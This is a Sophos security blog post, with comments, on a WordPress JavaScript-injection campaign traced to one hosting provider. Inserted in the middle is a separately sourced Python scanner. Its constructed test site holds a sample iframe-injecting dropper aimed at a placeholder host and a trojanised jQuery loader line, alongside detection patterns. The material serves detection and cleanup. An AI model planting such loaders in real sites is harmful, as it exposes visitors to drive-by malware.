Large US hosting provider hit in web attack

Filed Under: Malware, SophosLabs

Over the past few weeks, we have been seeing a whole mix of legitimate web sites serving up a specific malicious JavaScript. When innocent users browse these sites, the injected JavaScript adds an iframe element to the page in order to load further malicious content from a remote site.

As you can see, the injected scripts are polymorphic and heavily obfuscated, one of the common tricks used by hackers in an attempt to evade detection. Regardless of the obfuscation, Sophos products generically block the malicious scripts as Mal/JSIfrLd-A.

Looking at a number of the affected sites, it was quickly apparent that they shared a common link - they all seemed to be running WordPress. Ahah, the root cause? After all, WordPress injection attacks are pretty commonplace, and something all site admins should be aware of.

In typical WordPress injection attacks, the database ends up "peppered" with malicious HTML (typically an iframe or script element to load other remote content) such that the web pages users view when browsing the site contain that malicious code. In this latest attack however, things are a little more complex.

Firstly, one or more files containing malicious JavaScript are added to the site, within an existing folder using a .php filename, for example:

.../wp-content/plugins/wp-polls/tinymce/plugins/polls/langs/mm_menu.php
.../wp-includes/js/tinymce/plugins/media/AC_OETags.js.php
.../wp-content/uploads/2010/02/bigballs.php
.../games/IE7.php
.../wp-includes/js/tinymce/plugins/fullscreen/mod_jw_sir.php
.../es/wp-includes/js/tinymce/plugins/directionality/md5-min.php

Then a legitimate JavaScript file that is already used by the site is modified to include a call to the above file(s). For example, the hacked jQuery script found on one of the victim sites is shown below. You can see the malicious code that has been added to the beginning of the file, which will attempt to load five malicious scripts that have been added to the site.
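The two artefacts described above (JavaScript bodies dropped under `.php` names inside existing WordPress folders, and a legitimate `.js` file whose head was altered to pull them in) are the sort of thing a site owner can sweep for directly. The following is an added example, not Sophos detection logic or code from the post: a small filesystem scan that builds a constructed sample tree in a temp directory, applies those heuristics plus a known-good hash check for core scripts, and returns the findings. The sample file names echo the paths listed in the post; their contents, the `example.invalid` URL and the "known-good" hash are all made up here.

```python
import hashlib, os, re, tempfile

JS_MARKERS = re.compile(r"document\.write|unescape\(|fromCharCode|\beval\(", re.I)
PHP_LOADER = re.compile(r"""src\s*=\s*['"][^'"]*\.php['"]""", re.I)

def scan_tree(root, known_good):
    """Walk a WordPress tree and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            text = data.decode("utf-8", "replace")
            if name.endswith(".php"):
                if name.endswith(".js.php"):  # e.g. AC_OETags.js.php: a script name wearing a .php suffix
                    findings.append((rel, "double extension .js.php"))
                if rel.startswith("wp-content/uploads/"):  # uploads should hold media, never executable PHP
                    findings.append((rel, "PHP file inside uploads directory"))
                if "<?" not in text and JS_MARKERS.search(text):  # no PHP open tag, but JS loader idioms
                    findings.append((rel, "JavaScript body in a .php file"))
            elif name.endswith(".js"):
                if rel in known_good and hashlib.sha256(data).hexdigest() != known_good[rel]:
                    findings.append((rel, "hash differs from known-good copy"))
                if PHP_LOADER.search(text[:512]):  # the injection sits at the start of the file
                    findings.append((rel, "script head loads a .php file"))
    return sorted(findings)

def build_demo_site(root):
    # Constructed sample tree: trojanised jQuery, JS droppers under .php names, one clean plugin file.
    clean = "/*! jQuery */ (function(w){ w.jQuery = {}; })(window);\n"
    dropper = "var u=unescape('%3Ciframe%20src%3Dhttp://example.invalid/%3E');document.write(u);\n"
    loader = "document.write('<script src=\"/wp-includes/js/tinymce/plugins/media/AC_OETags.js.php\"></script>');\n"
    files = {
        "wp-includes/js/jquery/jquery.js": loader + clean,
        "wp-includes/js/tinymce/plugins/media/AC_OETags.js.php": dropper,
        "wp-content/uploads/2010/02/bigballs.php": dropper,
        "wp-content/plugins/wp-polls/wp-polls.php": "<?php // legitimate plugin code\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body.encode())
    return {"wp-includes/js/jquery/jquery.js": hashlib.sha256(clean.encode()).hexdigest()}

def run_demo():
    with tempfile.TemporaryDirectory() as root:
        return scan_tree(root, build_demo_site(root))
```

On a real install, `known_good` would be the SHA-256 of each core and plugin script taken from a pristine download of the same version, and the PHP-body check should be read as a triage hint, since a dropper wrapped in `<?php echo ... ?>` would need a content-based rule instead.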

So, is WordPress really the relevant link between the affected sites? Or is that just coincidence? Earlier today I queried all of the sites that we have seen hit in this attack over the past 7 days, identifying almost 600. When looking at the GeoIP data for these sites I found that 97% of them were hosted by the same provider! Couple this with the fact that several different WordPress versions are being used by the affected sites (including the latest version in some cases) and I think the finger of blame should perhaps be pointing somewhere other than WordPress.

Digging further, it would appear that the hosting provider in question is no stranger to site hacks, as official posts on their company blog testify. In such cases it is imperative that in addition to cleaning up affected sites, the target of the attack is identified (be it a vulnerable server, web application or otherwise). Only then can any vulnerabilities or insecurities be closed, to prevent future similar attacks.

As a footnote, whilst security may not be your top priority when choosing a hosting provider, it should be pretty high up the list. Assume that all servers, sites and web applications will be attacked. Assume that some of these attacks will succeed. What you want to know is how your provider will respond - from clean up to hardening against future attacks.


9 Responses to Large US hosting provider hit in web attack

  1. Pics (or in this case, names/details) or it didn't happen.

    • fraserhoward · 1372 days ago

      Well, it is not about naming and shaming the hosting provider in such situations. First thing is to get the problem resolved and sites cleaned up - we are making contact with them to achieve this. As I touched on in the post, of more interest is how rapidly providers are able to respond to an attack.

      • pbinbellv · 1371 days ago

        How about alerting the people who might be unknowing customers of this hosting provider? It seems like you're choosing to protect the reputation (really?) of this provider over the security of your readers. I'm an admirer of your articles but I have to say this one is of no use unless you post the name of the hosting provider responsible.

        My opinion anyway.

        • chpster · 1368 days ago

          Ditto, I agree with pbinbellv. I am a customer of a couple of different hosting companies; I'd like to know if any of my sites are at risk.

  2. Brandon · 1372 days ago

    Most of these providers are in the business to make money, not because they love giving others a platform to express themselves. Furthermore, I doubt most hosting providers disclose these sorts of breaches to their subscribers.

    I understand we want to give these providers the benefit of the doubt but if their reputation isn't at stake, it's likely their revenue isn't either. Therefore, if it doesn't impact business, why increase operating costs?

  3. G79 · 1371 days ago

    It will be 1&1 Internet, the world's worst web host.

    One of our customers, who chose to host with 1&1 for their cheapness, woke up after the weekend to find out that their site had been hijacked with an image embedded on their site stating just that!

    No one should host a site with a web host who clearly does not take security seriously, and any host who has compromised sites due to the lack of adequate security measures should be penalized, plain and simple.

    In today's world of automation there's absolutely no excuse for not patching web servers!

  4. From what I've seen, most cases are due to outdated versions of software (over 70% in fact).

    In this specific case, I'd be willing to bet the vector had something to do with directory traversal in multi-domain accounts, and/or FTP user issues.

    This is most likely how it started spreading, and then used outdated, known to be exploited versions of WordPress (& other software) to exploit, infect, and reinfect.

    • G79 · 1356 days ago

      That may be true, dremeda, but that leaves around 30% that could be due to inadequate security measures and lack of or slow distribution of server software updates!

      Web hosts should be locking down FTP accounts by default and forcing users to have to unlock to upload by IP address or time slots only.

      • Harbinger · 867 days ago

        G79 while that may be true, people who get into web hosting should have a more advanced idea of what they're doing. Locking the FTP accounts isn't hard to do and most people don't even know FTP or IP from the other. Most often they'll just do as instructed, which is why the onus is on us to help propagate security and to enforce what we see as valid security measures.


About the author

Fraser is one of the Principal Virus Researchers in SophosLabs. He has been working for Sophos since 2006, and his main interest is in web related threats.